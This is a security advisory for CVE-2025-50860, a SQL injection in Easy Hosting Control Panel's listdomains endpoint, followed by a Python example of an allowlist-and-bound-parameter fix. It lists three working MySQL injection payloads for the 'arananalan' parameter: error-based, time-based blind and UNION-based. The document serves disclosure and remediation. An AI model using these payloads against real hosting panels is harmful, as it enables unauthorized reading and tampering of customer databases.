Title: Easy Hosting Control Panel (EHCP) 20.04.1.b - SQL Injection in the listdomains function via the arananalan POST parameter

Description: A SQL injection vulnerability exists in the listdomains function of Easy Hosting Control Panel (EHCP) 20.04.1.b. Insufficient validation of the arananalan POST parameter in the /index.php?op=listdomains endpoint allows an authenticated attacker to inject malicious SQL into the backend query. By leveraging error-based, time-based blind, and UNION-based techniques, the attacker can extract or manipulate backend database content, potentially leading to unauthorized access and full compromise of the database.

Source Name/Email: Korn Chaisuwan (korn.c.sec@gmail.com), Charanin Thongudom (charanin.t.sec@gmail.com), Pongtorn Angsuchotmetee (monkeydouy@gmail.com)

CVEs: CVE-2025-50860

Software URL: https://www.ehcp.net/

Parameter: arananalan (POST)

Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: aranan=test&arananalan=(UPDATEXML(8509,CONCAT(0x2e,0x7162717071,(SELECT (ELT(8509=8509,1))),0x7178627871),5369))

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: aranan=test&arananalan=(SELECT 2663 FROM (SELECT(SLEEP(5)))NNwr)

Type: UNION query
Title: MySQL UNION query (23) - 8 columns
Payload: aranan=test&arananalan=-9147 UNION ALL SELECT 23,23,CONCAT(0x7162717071,0x696d4f4961444246667a4a5843676b74557165416a6253447a6343725472506f4749456d68547075,0x7178627871),23,23,23,23,23#
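All three payloads are "parameter replace" injections, which means arananalan reaches the query unquoted, the way a column name or expression would. The following is an added, language-neutral illustration of the remediation pattern, not EHCP's own code (EHCP is written in PHP; the domains table, its column names, and the reading of aranan as the search value and arananalan as the column selector are assumptions): an identifier cannot be bound as a query parameter, so it is checked against a fixed allowlist, while the search value is always bound.

```python
import sqlite3

# Constructed allowlist of columns the search may filter on. Anything that is not
# exactly one of these names is rejected before any SQL is assembled.
ALLOWED_SEARCH_COLUMNS = {"domainname", "panelusername", "reseller"}


def build_listdomains_query(aranan: str, arananalan: str):
    """Return (sql, params) for the domain search, or raise ValueError.

    arananalan selects the column (an SQL identifier, which cannot be a bound
    parameter, hence the allowlist); aranan is the value and is always bound,
    so quotes, comments or UNION keywords in it are matched literally.
    """
    if arananalan not in ALLOWED_SEARCH_COLUMNS:
        raise ValueError(f"rejected search column: {arananalan[:40]!r}")
    sql = (f"SELECT domainname, panelusername FROM domains "
           f"WHERE {arananalan} LIKE ? ORDER BY domainname")
    return sql, (f"%{aranan}%",)


def list_domains(conn, aranan: str, arananalan: str):
    sql, params = build_listdomains_query(aranan, arananalan)
    return [row[0] for row in conn.execute(sql, params)]


def demo_conn():
    # Constructed in-memory sample data standing in for the panel's database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE domains (domainname TEXT, panelusername TEXT, reseller TEXT)")
    conn.executemany("INSERT INTO domains VALUES (?, ?, ?)", [
        ("example.test", "alice", "admin"),
        ("test-site.test", "bob", "admin"),
        ("other.test", "carol", "reseller1"),
    ])
    return conn


if __name__ == "__main__":
    conn = demo_conn()
    print(list_domains(conn, "site", "domainname"))
    try:
        # The advisory's time-based payload never reaches the database.
        list_domains(conn, "test", "(SELECT 2663 FROM (SELECT(SLEEP(5)))NNwr)")
    except ValueError as err:
        print("blocked:", err)
```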